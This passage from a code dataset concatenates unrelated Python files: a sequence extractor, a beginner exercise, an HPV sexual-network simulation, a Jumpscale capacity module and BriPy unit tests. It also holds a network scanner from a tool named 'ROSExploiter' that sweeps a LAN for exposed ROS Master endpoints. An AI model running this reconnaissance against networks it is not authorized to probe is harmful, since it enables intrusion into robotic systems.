sys.argv[2]\noutfile = sys.argv[3]\n\nAI_DICT = {}\n\nwith open(listfile, \"rU\") as list_in:\n for line in list_in:\n AI_DICT[line[:-1]] = 1\n\nskip = 0\n\nwith open(infile, \"rU\") as fh_in:\n with open(outfile, \"w\") as fh_out:\n for line in fh_in:\n if line.startswith('>'):\n line_split = line.split('=')\n gene = line_split[0]\n if gene in AI_DICT:\n fh_out.write(line)\n skip = 0\n else:\n skip = 1\n else:\n if not skip:\n 
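# non-header lines are copied through only while the current record's header matched the ID list\n 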
fh_out.write(line)\n","sub_path":"evolinc-ii/4.0/extract_sequences.py","file_name":"extract_sequences.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"210300972","text":"# coding: utf-8\n# IF ELIF ELSE conditionals\n# Classifying athletes\n\nfrom datetime import date\n\nanoNascimento = int(input(\"Ano de Nascimento: \"))\nidade = date.today().year - anoNascimento\n\ncategoria = \"\"\nif (idade <= 9):\n    categoria = \"MIRIM\"\nelif (idade <= 14):\n    categoria = \"INFANTIL\"\nelif (idade <= 19):\n    categoria = \"JUNIOR\"\nelif (idade <= 25):\n    categoria = \"SÊNIOR\"\nelse:\n    categoria = \"MASTER\"\n\nprint(\"O atleta tem {} anos.\".format(idade))\nprint(\"Classificação: {}\".format(categoria))\n\n","sub_path":"mundo2/exercicio41.py","file_name":"exercicio41.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"207237578","text":"import uuid\nfrom enum import Enum\nimport random\nimport time\nimport numpy as np\nimport pandas as pd\n\nnp.seterr(divide='ignore', invalid='ignore')\n\n\nclass Gender(Enum):\n    MALE = 1\n    FEMALE = 2\n\n\nclass HPVType(Enum):\n    HPV16 = 0\n    HPV18 = 1\n    HPVoHR = 2\n    HPVLR = 3\n\n\nclass Data:\n\n    def __init__(self, section):\n        self.COHORT_SIZE: int = int(section[\"COHORT_SIZE\"])\n        self.SIM_YEARS: int = int(section[\"SIM_YEARS\"])\n        self.SIM_MONTHS = self.SIM_YEARS * 12\n        self.CYCLE_LENGTH: int = int(section[\"CYCLE_LENGTH\"])\n        self.CONCURRENCY_MALE: float = float(section[\"CONCURRENCY_MALE\"])\n        self.CONCURRENCY_FEMALE: float = float(section[\"CONCURRENCY_FEMALE\"])\n        self.PROB_MARITAL: float = float(section[\"PROB_MARITAL\"])\n        self.PROB_CASUAL: float = float(section[\"PROB_CASUAL\"])\n        self.PROB_SHORT_TERM: float = float(section[\"PROB_SHORT_TERM\"])\n        self.PROB_INSTANTANEOUS: float = float(section[\"PROB_INSTANTANEOUS\"])\n        self.DUR_MARITAL: int = int(section[\"DUR_MARITAL\"])\n        self.DUR_CASUAL: int = int(section[\"DUR_CASUAL\"])\n        self.DUR_SHORT_TERM: int = int(section[\"DUR_SHORT_TERM\"])\n        self.SEX_PER_MONTH_MARITAL: int = int(section[\"SEX_PER_MONTH_MARITAL\"])\n        self.SEX_PER_MONTH_CASUAL: int = int(section[\"SEX_PER_MONTH_CASUAL\"])\n        self.SEX_PER_MONTH_SHORT_TERM: int = int(section[\"SEX_PER_MONTH_SHORT_TERM\"])\n        self.SEXUAL_DEBUT_AGE: int = int(section[\"SEXUAL_DEBUT_AGE\"])\n        self.TRANSMISSION_PER_SEX_ACT: float = float(section[\"TRANSMISSION_PER_SEX_ACT\"])\n        self.NATURAL_IMMUNITY_HPV16: float = float(section[\"NATURAL_IMMUNITY_HPV16\"])\n        self.NATURAL_IMMUNITY_HPV18: float = float(section[\"NATURAL_IMMUNITY_HPV18\"])\n        self.NATURAL_IMMUNITY_HPVoHR: float = float(section[\"NATURAL_IMMUNITY_HPVoHR\"])\n        self.NATURAL_IMMUNITY_HPVLR: float = float(section[\"NATURAL_IMMUNITY_HPVLR\"])\n        self.BACKGROUND_MORTALITY_FEMALE = pd.read_csv(section[\"BACKGROUND_MORTALITY_FEMALE_FILE\"])\n        self.BACKGROUND_MORTALITY_MALE = pd.read_csv(section[\"BACKGROUND_MORTALITY_MALE_FILE\"])\n        self.AGE_OF_PARTNER = pd.read_csv(section[\"AGE_OF_PARTNER_FILE\"])\n        self.PARTNERSHIP_FORMATION = pd.read_csv(section[\"PARTNERSHIP_FORMATION_FILE\"])\n        self.INITIAL_POPULATION = pd.read_csv(section[\"INITIAL_POPULATION_FILE\"])\n        self.HPV_CLEARANCE = pd.read_csv(section[\"HPV_CLEARANCE_FILE\"])\n        self.incidentinfections = [[0] * self.SIM_YEARS for _ in range(self.INITIAL_POPULATION.shape[0])]\n        self.prevalentinfections = [[0] * self.SIM_YEARS for _ in range(self.INITIAL_POPULATION.shape[0])]\n 
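# [age][year] counter matrices: one row per age in the initial population table, one column per simulation year\n 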
self.noinfection = [[0] * self.SIM_YEARS for _ in range(self.INITIAL_POPULATION.shape[0])]\n self.totalalive = [[0] * self.SIM_YEARS for _ in range(self.INITIAL_POPULATION.shape[0])]\n\n def count_incident_infections(self, infection):\n self.incidentinfections[infection.InfectionAge][Individual.year] += 1\n\n def count_infection_denom(self, age):\n self.noinfection[age][Individual.year] += 1\n\n def count_prevalent_infections(self, age):\n self.prevalentinfections[age][Individual.year] += 1\n\n def count_total_alive(self, age):\n self.totalalive[age][Individual.year] += 1\n\n def write_infections(self, run):\n incidence = np.divide(self.incidentinfections, self.noinfection)\n prevalence = np.divide(self.prevalentinfections, self.totalalive)\n np.savetxt('incidence_' + run + '.csv', incidence, fmt='%f')\n np.savetxt('prevalence_' + run + '.csv', prevalence, fmt='%f')\n\n\nclass Infection:\n\n def __init__(self):\n self.Type = None\n self.Timer = 1\n self.HPVTransmission = None\n self.NaturalImmunity = None\n\n def get_clearance(self):\n return -1\n\n def check_serodiscordance(self, person, sexacts):\n discordant = True\n infection_keys = [key for key, value in person.Infections.items() if value.Type == self.Type]\n if len(infection_keys) > 0:\n discordant = False\n\n if discordant:\n self.transmit_infection(person, sexacts)\n\n def transmit_infection(self, person, sexacts):\n pass\n\n def get_hpv_transmission(self, person):\n infection_keys = [key for key, value in person.ClearedInfections.items() if value.Type == self.Type]\n if len(infection_keys) > 0:\n history = True\n else:\n history = False\n if history:\n return self.HPVTransmission * self.NaturalImmunity\n else:\n return self.HPVTransmission\n\n\nclass HPV16Infection(Infection):\n\n def __init__(self, data, age):\n super(HPV16Infection, self).__init__()\n self.Type = HPVType.HPV16\n self.HPVClearance = data.HPV_CLEARANCE[\"HPV16\"]\n self.HPVTransmission = data.TRANSMISSION_PER_SEX_ACT\n self.InfectionAge = age\n self.NaturalImmunity = data.NATURAL_IMMUNITY_HPV16\n\n def get_clearance(self):\n return self.HPVClearance.iloc[self.Timer]\n\n def transmit_infection(self, person, sexacts):\n for _ in range(sexacts):\n rand = random.random()\n if rand < self.get_hpv_transmission(person):\n person.acquire_infection(HPV16Infection)\n break\n\n\nclass HPV18Infection(Infection):\n\n def __init__(self, data, age):\n super(HPV18Infection, self).__init__()\n self.Type = HPVType.HPV18\n self.HPVClearance = data.HPV_CLEARANCE[\"HPV18\"]\n self.HPVTransmission = data.TRANSMISSION_PER_SEX_ACT\n self.InfectionAge = age\n self.NaturalImmunity = data.NATURAL_IMMUNITY_HPV18\n\n def get_clearance(self):\n return self.HPVClearance.iloc[self.Timer]\n\n def transmit_infection(self, person, sexacts):\n for _ in range(sexacts):\n rand = random.random()\n if rand < self.get_hpv_transmission(person):\n person.acquire_infection(HPV18Infection)\n break\n\n\nclass HPVoHRInfection(Infection):\n\n def __init__(self, data, age):\n super(HPVoHRInfection, self).__init__()\n self.Type = HPVType.HPVoHR\n self.HPVClearance = data.HPV_CLEARANCE[\"HPVoHR\"]\n self.HPVTransmission = data.TRANSMISSION_PER_SEX_ACT\n self.InfectionAge = age\n self.NaturalImmunity = data.NATURAL_IMMUNITY_HPVoHR\n\n def get_clearance(self):\n return self.HPVClearance.iloc[self.Timer]\n\n def transmit_infection(self, person, sexacts):\n for _ in range(sexacts):\n rand = random.random()\n if rand < self.get_hpv_transmission(person):\n person.acquire_infection(HPVoHRInfection)\n break\n\n\nclass 
HPVLRInfection(Infection):\n\n    def __init__(self, data, age):\n        super(HPVLRInfection, self).__init__()\n        self.Type = HPVType.HPVLR\n        self.HPVClearance = data.HPV_CLEARANCE[\"HPVLR\"]\n        self.HPVTransmission = data.TRANSMISSION_PER_SEX_ACT\n        self.InfectionAge = age\n        self.NaturalImmunity = data.NATURAL_IMMUNITY_HPVLR\n\n    def get_clearance(self):\n        return self.HPVClearance.iloc[self.Timer]\n\n    def transmit_infection(self, person, sexacts):\n        for _ in range(sexacts):\n            rand = random.random()\n            if rand < self.get_hpv_transmission(person):\n                person.acquire_infection(HPVLRInfection)\n                break\n\n\nclass PartnershipType(Enum):\n    MARITAL = 1\n    SHORT_TERM = 2\n    CASUAL = 3\n    INSTANTANEOUS = 4\n\n\nclass Partnership:\n\n    def __init__(\n            self,\n            partnershipid,\n            woman,\n            man,\n            data,\n            poisson_randomizer=lambda average: np.random.poisson(average, None)):\n        self.data = data\n        self.partnership_id = partnershipid\n        self.male = man\n        self.male_id = man.id\n        self.female = woman\n        self.female_id = woman.id\n        self.partnership_duration = 1\n        self.maxdur = 12 * poisson_randomizer(self.average_duration())\n        self.sexacts = poisson_randomizer(self.sex_acts())\n        self.active = True\n\n    def average_duration(self):\n        # Kinda expected that we'd never instantiate this class directly, but instead instantiate the subclasses\n        # So this really shouldn't be hit. Probably should make it error\n        return -1\n\n    def sex_acts(self):\n        return -1\n\n    def check_serodiscordance(self):\n        for _, inf in self.male.Infections.items():\n            inf.check_serodiscordance(self.female, self.sexacts)\n        for _, inf in self.female.Infections.items():\n            inf.check_serodiscordance(self.male, self.sexacts)\n\n    def check_relationships(self):\n        if self.female.alive and self.male.alive:\n            self.check_serodiscordance()\n            if self.partnership_duration < self.maxdur:\n                self.partnership_duration += 1\n            else:\n                self.dissolve_relationship()\n        else:\n            self.dissolve_relationship()\n\n    def dissolve_relationship(self):\n        self.female.numpartners -= 1\n        self.female.partnershipid.remove(self.partnership_id)\n        self.male.partnershipid.remove(self.partnership_id)\n        self.male.numpartners -= 1\n        self.active = False\n\n\nclass Marriage(Partnership):\n    def __init__(\n            self,\n            partnershipid,\n            woman,\n            man,\n            data,\n            duration_randomizer=lambda average: np.random.poisson(average, None)):\n        # forward 'data' explicitly so Partnership receives it in the right slot\n        super().__init__(partnershipid, woman, man, data, duration_randomizer)\n\n    def average_duration(self):\n        return self.data.DUR_MARITAL\n\n    def sex_acts(self):\n        return self.data.SEX_PER_MONTH_MARITAL\n\n\nclass CasualRelationship(Partnership):\n    def __init__(\n            self,\n            partnershipid,\n            woman,\n            man,\n            data,\n            duration_randomizer=lambda average: np.random.poisson(average, None)):\n        super().__init__(partnershipid, woman, man, data, duration_randomizer)\n\n    def average_duration(self):\n        return self.data.DUR_CASUAL\n\n    def sex_acts(self):\n        return self.data.SEX_PER_MONTH_CASUAL\n\n\nclass ShortTermRelationship(Partnership):\n    def __init__(\n            self,\n            partnershipid,\n            woman,\n            man,\n            data,\n            duration_randomizer=lambda average: np.random.poisson(average, None)):\n        super().__init__(partnershipid, woman, man, data, duration_randomizer)\n\n    def average_duration(self):\n        return self.data.DUR_SHORT_TERM\n\n    def sex_acts(self):\n        return self.data.SEX_PER_MONTH_SHORT_TERM\n\n\nclass InstantaneousRelationship(Partnership):\n    def __init__(\n            self,\n            partnershipid,\n            woman,\n            man,\n            data,\n            duration_randomizer=lambda average: np.random.poisson(average, None)):\n        super().__init__(partnershipid, woman, man, data, duration_randomizer)\n\n    def average_duration(self):\n        return 
0\n\n def sex_acts(self):\n return 1\n\n\nclass Individual:\n month = 0\n year = 0\n\n def __init__(self,\n age,\n identifier,\n data):\n self.single = True\n self.numpartners = 0\n self.partnershipid = []\n self.alive = True\n self.Infections = dict()\n self.ClearedInfections = dict()\n self.age = age\n self.month_age = age * 12\n self.id = identifier\n self.data = data\n self.ageofpartner = data.AGE_OF_PARTNER\n self.sexualdebutage = data.SEXUAL_DEBUT_AGE\n self.partnershipformation = data.PARTNERSHIP_FORMATION\n\n def acquire_infection(self, infectiontype):\n infection_id = uuid.uuid1()\n self.Infections[infection_id] = infectiontype(self.data, self.age)\n self.data.count_incident_infections(self.Infections[infection_id])\n\n def clear_infection(self, infection_id):\n self.ClearedInfections[infection_id] = self.Infections[infection_id]\n del self.Infections[infection_id]\n\n def infection_natural_history(self):\n infections_to_clear = []\n for infid, inf in self.Infections.items():\n prob_clear = inf.get_clearance()\n rand = random.random()\n if rand < prob_clear:\n infections_to_clear.append(infid)\n else:\n inf.Timer += 1\n\n for inf in infections_to_clear:\n self.clear_infection(inf)\n\n def seed_infection(self):\n if 17 < self.age < 30:\n rand = random.random()\n if rand < 0.05:\n self.acquire_infection(HPVoHRInfection)\n elif rand < 0.15:\n self.acquire_infection(HPV16Infection)\n elif rand < 0.22:\n self.acquire_infection(HPV18Infection)\n elif rand < 0.3:\n self.acquire_infection(HPVLRInfection)\n\n def natural_history(self):\n rand = random.random()\n if rand < self.get_mortality():\n self.alive = False\n else:\n self.data.count_total_alive(self.age)\n if len(self.Infections) == 0:\n self.data.count_infection_denom(self.age)\n else:\n self.data.count_prevalent_infections(self.age)\n self.infection_natural_history()\n\n def get_mortality(self):\n pass\n\n\nclass Woman(Individual):\n def __init__(\n self,\n age,\n identifier,\n data):\n super(Woman, self).__init__(age, identifier, data)\n self.gender = Gender.FEMALE\n self.mortality = data.BACKGROUND_MORTALITY_FEMALE\n self.concurrency = data.CONCURRENCY_FEMALE\n\n def get_mortality(self):\n return self.mortality.iloc[self.age][\"mASR\"]\n\n def add_partner(self, man, relationshiptype, partnerships):\n partnership_id = uuid.uuid1()\n partnerships[partnership_id] = relationshiptype(partnership_id, self, man, self.data)\n self.numpartners += 1\n self.partnershipid.append(partnership_id)\n man.partnershipid.append(partnership_id)\n man.numpartners += 1\n\n def check_eligibility(self, man, partnerships):\n if man.alive:\n alreadypartner = False\n for key in self.partnershipid:\n if partnerships[key].female_id == self.id and partnerships[key].male_id == man.id:\n if partnerships[key].active:\n alreadypartner = True\n return not alreadypartner\n else:\n return False\n\n def get_age_of_partner(self):\n age = np.random.poisson(self.ageofpartner.iloc[self.age][\"mean\"], None)\n while age > 75:\n age = np.random.poisson(self.ageofpartner.iloc[self.age][\"mean\"], None)\n return age\n\n def create_partnership(self, lookup_table, partnerships):\n ageofpartner = self.get_age_of_partner()\n keys = list(lookup_table[ageofpartner].keys())\n random.shuffle(keys)\n # lookup by eligibility\n for m in keys:\n if self.check_eligibility(lookup_table[ageofpartner][m], partnerships):\n if lookup_table[ageofpartner][m].numpartners == 0:\n relationship_type = self.assign_partnership_type(True)\n self.add_partner(lookup_table[ageofpartner][m], 
relationship_type, partnerships)\n                    # add_partner already updates numpartners for both partners\n                    lookup_table[ageofpartner][m].single = False\n                    self.single = False\n                    break\n                else:\n                    rand = random.random()\n                    if rand < lookup_table[ageofpartner][m].concurrency:\n                        relationship_type = self.assign_partnership_type(False)\n                        self.add_partner(lookup_table[ageofpartner][m], relationship_type, partnerships)\n                        lookup_table[ageofpartner][m].single = False\n                        self.single = False\n                        break\n\n    def assign_partnership_type(self, single):\n        if single:\n            rand = random.random()\n            if rand < self.data.PROB_CASUAL:\n                return CasualRelationship\n            elif rand < (self.data.PROB_CASUAL + self.data.PROB_MARITAL):\n                return Marriage\n            elif rand < (self.data.PROB_CASUAL + self.data.PROB_MARITAL + self.data.PROB_SHORT_TERM):\n                return ShortTermRelationship\n            else:\n                return InstantaneousRelationship\n        else:\n            rand = random.random()\n            if rand < self.data.PROB_CASUAL:\n                return CasualRelationship\n            else:\n                return InstantaneousRelationship\n\n    def run_partnerships(self, lookup_table, partnerships):\n        if self.sexualdebutage <= self.age <= 74:\n            if self.numpartners == 0:\n                rand = random.random()\n                if rand < self.partnershipformation.iloc[self.age][\"Female\"]:\n                    self.create_partnership(lookup_table, partnerships)\n            else:\n                rand = random.random()\n                if rand < self.concurrency:\n                    self.create_partnership(lookup_table, partnerships)\n\n\nclass Man(Individual):\n    def __init__(\n            self,\n            age,\n            identifier,\n            data):\n        super(Man, self).__init__(age, identifier, data)\n        self.gender = Gender.MALE\n        self.mortality = data.BACKGROUND_MORTALITY_MALE\n        self.concurrency = data.CONCURRENCY_MALE\n\n    def get_mortality(self):\n        return self.mortality.iloc[self.age][\"mASR\"]\n\n\nclass TimerError(Exception):\n    \"\"\"A custom exception used to report errors in use of Timer class\"\"\"\n\n\nclass Timer:\n    def __init__(self):\n        self._start_time = None\n\n    def start(self):\n        \"\"\"Start a new timer\"\"\"\n        if self._start_time is not None:\n            raise TimerError(f\"Timer is running. Use .stop() to stop it\")\n\n        self._start_time = time.perf_counter()\n\n    def stop(self):\n        \"\"\"Stop the timer, and report the elapsed time\"\"\"\n        if self._start_time is None:\n            raise TimerError(f\"Timer is not running. 
Use .start() to start it\")\n\n elapsed_time = time.perf_counter() - self._start_time\n self._start_time = None\n print(f\"Elapsed time: {elapsed_time:0.4f} seconds\")\n","sub_path":"sexualnetwork.py","file_name":"sexualnetwork.py","file_ext":"py","file_size_in_byte":18469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"503489203","text":"#!/usr/bin/env python3\n\nimport sys\nimport time\nimport threading\nimport os\nfrom termcolor import colored, cprint\n\nfrom modulesROS1.toolbox import network\nfrom modulesROS1.toolbox import api\n\nclass ScannerSupport:\n \"\"\"\n Collection of support methods for ROSScanner()\n \"\"\"\n\n def __init__(self):\n self.found_master_hosts = []\n self.temp_masters_bin = []\n self.port_range_counter = 0\n self.port_range_start = 11303 # CHANGE BACK TO 1024\n self.port_range_end = 11340 # CHANGE BACK TO 65536\n self.stop_scan = False\n\n self.interface = network.InterfaceScanner().networkInterface('scan')\n self.ipscan = network.IPScanner(self.interface)\n\n\n def threadProcess(self, method):\n \"\"\" starts second process for animation purposes \"\"\"\n\n process = threading.Thread(target=method)\n process.start()\n return process\n\n\n def invalidInput(self):\n \"\"\" prints invalid input notification \"\"\"\n\n sys.stdout.write(colored(\"\\r[!] Invalid input\", 'red'))\n time.sleep(1)\n sys.stdout.flush()\n\n\n def scanStopped(self):\n \"\"\" verifies if the user wants to stop the network scan after a new ROS Master is found \"\"\"\n\n os.system('clear')\n cprint(\"[+] Network scan stopped. {} ROS Master(s) found with URI:\".\n format(len(self.found_master_hosts)), 'green', attrs=['bold'])\n for master in self.found_master_hosts:\n cprint(\"\\r [*] http://{}:{}\".format(master[0], master[1]), 'white')\n\n\n\nclass ROSScanner(ScannerSupport):\n \"\"\"\n Scans LAN-network for ROS Master URI with the use of NMAP and native ROS1 XMLRPC requests\n \"\"\"\n\n def __init__(self):\n super().__init__()\n\n\n def defaultMasterFinder(self):\n \"\"\" determine default ROS Master \"\"\"\n\n active_hosts = network.NetworkScanner(self.ipscan.ipConstructor(), 11311).nmapScan()\n active_hosts = [h for h in active_hosts if h != self.ipscan.ipGateway()]\n if len(active_hosts) > 0:\n for host in active_hosts:\n rpc = api.XMLRPC_API(host, 11311)\n if rpc.masterCheck() == True:\n self.found_master_hosts.append([host, 11311])\n\n\n def definedMasterFinder(self):\n \"\"\" determine custom defined ROS Master \"\"\"\n\n for port in range((self.port_range_start + self.port_range_counter), self.port_range_end):\n self.port_range_counter += 1\n if port == 11311:\n continue\n\n self.temp_masters_bin = []\n active_hosts = network.NetworkScanner(self.ipscan.ipConstructor(), port).nmapScan()\n active_hosts = [h for h in active_hosts if h != self.ipscan.ipGateway()]\n if len(active_hosts) > 0:\n for host in active_hosts:\n rpc = api.XMLRPC_API(host, port)\n if rpc.masterCheck() == True:\n self.found_master_hosts.append([host, port])\n self.temp_masters_bin.append([host, port])\n return\n\n\n def animationDefaultROS(self):\n \"\"\" process animation for defaultMasterFinder() \"\"\"\n\n chars = \"/—\\|\"\n for c in chars:\n ip_range = self.ipscan.ipConstructor()\n sys.stdout.write(\n colored('\\r[' + c + \"] \" + \"Scanning network range {} for default ROS Master on port 11311\".\n format(ip_range), 'white'))\n sys.stdout.flush()\n time.sleep(0.25)\n\n\n def animationDefinedROS(self):\n \"\"\" process animation for 
definedMasterFinder() \"\"\"\n\n chars = \"/—\\|\"\n for c in chars:\n percentage = self.port_range_counter / (self.port_range_end - self.port_range_start) * 100\n ip_range = self.ipscan.ipConstructor()\n sys.stdout.write(colored(\n '\\r[' + c + \"] \" + \"Scanning network range {} for ROS Master on ports 1024-65535. Scan status: [{:.2f}\".\n format(ip_range, percentage) + \"%]\", 'white'))\n sys.stdout.flush()\n time.sleep(0.25)\n\n\n def scanControllerROS1(self):\n \"\"\" binds all the above methods together and controls the ROS1 scanner processes \"\"\"\n\n while True:\n cprint(\"\\n[!] Starting basic network scan..\", 'white', attrs=['bold'])\n default_ros_scan = self.threadProcess(self.defaultMasterFinder)\n while default_ros_scan.isAlive():\n self.animationDefaultROS()\n\n if len(self.found_master_hosts) > 0:\n cprint(\"\\n[+] Scan on default ROS port completed. {} ROS Master(s) found with default URI:\".\n format(len(self.found_master_hosts)), 'green', attrs=['bold'])\n for master in self.found_master_hosts:\n cprint(\"\\r [*] http://{}:11311\".format(master[0]), 'white')\n\n while True:\n varify = str(input(colored(\"\\nDo you want to continue scanning the non-default ROS Master \"\n \"ports 1024-65535 on the network? (Y)es | (N)o: \", 'white')))\n if varify.lower() not in ['y', 'n']:\n self.invalidInput()\n elif varify.lower() == \"n\":\n self.scanStopped()\n return self.found_master_hosts\n else:\n break\n break\n else:\n break\n\n if len(self.found_master_hosts) == 0:\n cprint(\"\\n[-] No default ROS Master found\", 'red', attrs=['bold'])\n\n cprint(\"\\n[!] Starting extensive network scan..\", 'white', attrs=['bold'])\n\n while (self.port_range_start + self.port_range_counter) != self.port_range_end:\n defined_ros_scan = self.threadProcess(self.definedMasterFinder)\n\n while defined_ros_scan.isAlive():\n self.animationDefinedROS()\n\n if len(self.temp_masters_bin) > 0 and (self.port_range_start + self.port_range_counter) < self.port_range_end:\n cprint(\"\\n[+] Network scan paused. ROS Master found at:\", 'green', attrs=['bold'])\n for master in self.temp_masters_bin:\n cprint(\"\\r [*] {}:{}\".format(master[0], master[1]), 'white')\n\n while True:\n varify = str(input(\"\\nDo you want to continue scanning the network? (Y)es | (N)o: \"))\n if varify.lower() not in ['y', 'n']:\n self.invalidInput()\n elif varify.lower() == \"n\":\n self.scanStopped()\n return self.found_master_hosts\n else:\n break\n\n elif len(self.found_master_hosts) > 0 and (self.port_range_start + self.port_range_counter) == self.port_range_end:\n os.system('clear')\n cprint(\"[+] Network scan completed. {} ROS Master(s) found with URI:\".\n format(len(self.found_master_hosts)), 'green', attrs=['bold'])\n for master in self.found_master_hosts:\n cprint(\" [*] http://{}:{}\".format(master[0], master[1]), 'white')\n return self.found_master_hosts\n\n else:\n cprint(\"\\n[-] No running ROS1 environment found on network: {}\".\n format(self.ipscan.ipConstructor()), 'red', attrs=['bold'])\n time.sleep(1)\n sys.exit(\"\\n[!] 
Shutting down ROS Exploiter\")\n","sub_path":"ROSExploiter/ros_exploiter/modulesROS1/scanner.py","file_name":"scanner.py","file_ext":"py","file_size_in_byte":7565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"293571067","text":"import io\n\nimport requests\n\nfrom Jumpscale import j\n\n\nclass Capacity:\n    def __init__(self, node):\n        self._node = node\n\n    def total_report(self):\n        \"\"\"\n        create a report of the total hardware capacity for\n        processor, memory, motherboard and disks\n        \"\"\"\n        cl = self._node.client\n        n = self._node\n\n        return j.tools.capacity.parser.get_report(cl.info.cpu(), cl.info.mem(), n.disks.list())\n\n    def reality_report(self):\n        \"\"\"\n        create a report of the actual used hardware capacity for\n        processor, memory, motherboard and disks\n        \"\"\"\n        total_report = self.total_report()\n\n        return j.tools.capacity.reality_parser.get_report(\n            disks=self._node.disks.list(),\n            storage_pools=self._node.storagepools.list(),\n            total_cpu_nr=total_report.CRU,\n            used_cpu=self._node.client.aggregator.query(\"machine.CPU.percent\"),\n            used_memory=self._node.client.info.mem()[\"used\"],\n        )\n\n    def node_parameters(self):\n        params = []\n        checking = [\"development\", \"debug\", \"support\"]\n\n        for check in checking:\n            if self._node.kernel_args.get(check) is not None:\n                params.append(check)\n\n        return params\n\n    def directory(self):\n        if \"staging\" in self._node.kernel_args:\n            # return a staging directory object\n            data = {\"base_uri\": \"https://staging.capacity.threefoldtoken.com\"}\n            return j.clients.threefold_directory.get(\"staging\", data=data, interactive=False)\n\n        # return production directory\n        return j.clients.threefold_directory.get(interactive=False)\n\n    def register(self):\n        farmer_id = self._node.kernel_args.get(\"farmer_id\")\n        if not farmer_id:\n            return False\n\n        # checking kernel parameters enabled\n        parameters = self.node_parameters()\n\n        robot_address = \"\"\n        public_addr = self._node.public_addr\n        if public_addr:\n            robot_address = \"http://%s:6600\" % public_addr\n        os_version = \"{branch} {revision}\".format(**self._node.client.info.version())\n\n        report = self.total_report()\n        data = dict(\n            node_id=self._node.node_id,\n            location=report.location,\n            total_resources=report.total(),\n            robot_address=robot_address,\n            os_version=os_version,\n            parameters=parameters,\n            uptime=int(self._node.uptime()),\n        )\n        data[\"farmer_id\"] = farmer_id\n\n        if \"private\" in self._node.kernel_args:\n            data[\"robot_address\"] = \"private\"\n        elif not data[\"robot_address\"]:\n            raise j.exceptions.Base(\"Can not register a node without robot_address\")\n\n        client = self.directory()\n\n        try:\n            _, resp = client.api.RegisterCapacity(data)\n        except requests.exceptions.HTTPError as err:\n            j.tools.logger._log_error(\"error pushing total capacity to the directory: %s\" % err.response.content)\n\n    def update_reality(self):\n        farmer_id = self._node.kernel_args.get(\"farmer_id\")\n        if not farmer_id:\n            return False\n\n        report = self.reality_report()\n        data = dict(\n            node_id=self._node.node_id,\n            farmer_id=farmer_id,\n            cru=report.CRU,\n            mru=report.MRU,\n            hru=report.HRU,\n            sru=report.SRU,\n        )\n\n        client = self.directory()\n\n        resp = client.api.UpdateActualUsedCapacity(data=data, node_id=self._node.node_id)\n        resp.raise_for_status()\n\n    def update_reserved(self, vms, vdisks, gateways):\n        farmer_id = self._node.kernel_args.get(\"farmer_id\")\n        if not farmer_id:\n            return False\n\n        report = j.tools.capacity.reservation_parser.get_report(vms, vdisks, 
gateways)\n data = dict(\n node_id=self._node.node_id,\n farmer_id=farmer_id,\n cru=report.CRU,\n mru=report.MRU,\n hru=report.HRU,\n sru=report.SRU,\n )\n\n client = self.directory()\n\n resp = client.api.UpdateReservedCapacity(data=data, node_id=self._node.node_id)\n resp.raise_for_status()\n","sub_path":"JumpscaleLibsExtra/sal_zos/capacity/Capacity.py","file_name":"Capacity.py","file_ext":"py","file_size_in_byte":4195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"410314813","text":"\"\"\"Storage Component tests\"\"\"\n\nfrom unittest import TestCase\nimport nose \n\nfrom nose.tools import assert_equal, assert_not_equal, assert_raises, raises, \\\n assert_almost_equal, assert_true, assert_false\n\nimport os\nimport warnings\nimport tables as tb\nimport numpy as np\n\nimport BriPy\nStorage = BriPy.Storage\nMassStream = BriPy.MassStream\n\nclass TestStorageConstructors(TestCase):\n \"\"\"Tests that the storage component constructors work.\"\"\"\n\n @classmethod\n def teardown_class(cls):\n for f in os.listdir('.'):\n if \"Isos.txt\" in f:\n os.remove(f)\n elif \"Params.txt\" in f:\n os.remove(f)\n elif f in [\".h5\", \"s.h5\"]:\n os.remove(f)\n\n def test_Storage_1(self):\n s = Storage()\n assert_equal(s.name, '')\n assert_equal(s.params2track, [\"Mass\"])\n\n def test_Storage_2(self):\n s = Storage(\"s\")\n assert_equal(s.name, 's')\n assert_equal(s.params2track, [\"Mass\"])\n\n\nclass TestStorageAttributes(TestCase):\n \"\"\"Tests that the fuel cycle component attributes work.\"\"\"\n\n @classmethod\n def teardown_class(cls):\n for f in os.listdir('.'):\n if \"Isos.txt\" in f:\n os.remove(f)\n elif \"Params.txt\" in f:\n os.remove(f)\n elif f in [\".h5\", \"s.h5\"]:\n os.remove(f)\n\n def test_decay_time(self):\n s = Storage()\n s.decay_time = 0.0\n assert_equal(s.decay_time, 0.0)\n s.decay_time = 628 \n assert_equal(s.decay_time, 628.0)\n\n def test_params2track(self):\n s = Storage()\n assert_equal(s.params2track, [\"Mass\"])\n s.params2track = [\"Om nom nom\"]\n assert_equal(s.params2track, [\"Om nom nom\"])\n \n\nclass TestStorageMethods(TestCase):\n \"\"\"Tests that the fuel cycle component methods work.\"\"\"\n\n @classmethod\n def teardown_class(cls):\n for f in os.listdir('.'):\n if \"Isos.txt\" in f:\n os.remove(f)\n elif \"Params.txt\" in f:\n os.remove(f)\n elif f in [\".h5\", \"s.h5\"]:\n os.remove(f)\n\n def test_doCalc_1(self):\n BriPy.isos2track([922350, 922380, 942390])\n s = Storage()\n s.decay_time = 0.0\n s.IsosIn = MassStream({942390: 1.0})\n s.doCalc()\n assert_equal(s.IsosOut.mass, 1.0)\n assert_almost_equal(s.IsosOut.comp[942390], 1.0) \n\n def test_doCalc_2(self):\n BriPy.isos2track([922350, 922380, 942390])\n s = Storage()\n s.decay_time = 0.0\n s.doCalc(MassStream({942390: 1.0}))\n assert_equal(s.IsosOut.mass, 1.0)\n assert_equal(s.IsosOut.comp[942390], 1.0) \n\n def test_doCalc_3(self):\n BriPy.isos2track([922350, 922380, 942390])\n s = Storage()\n s.IsosIn = MassStream({942390: 1.0})\n s.doCalc(24110*365.25*24*3600)\n assert(s.IsosOut.mass < 1.0)\n assert_almost_equal(s.IsosOut.comp[942390], 0.5, 3) \n\n def test_doCalc_4(self):\n 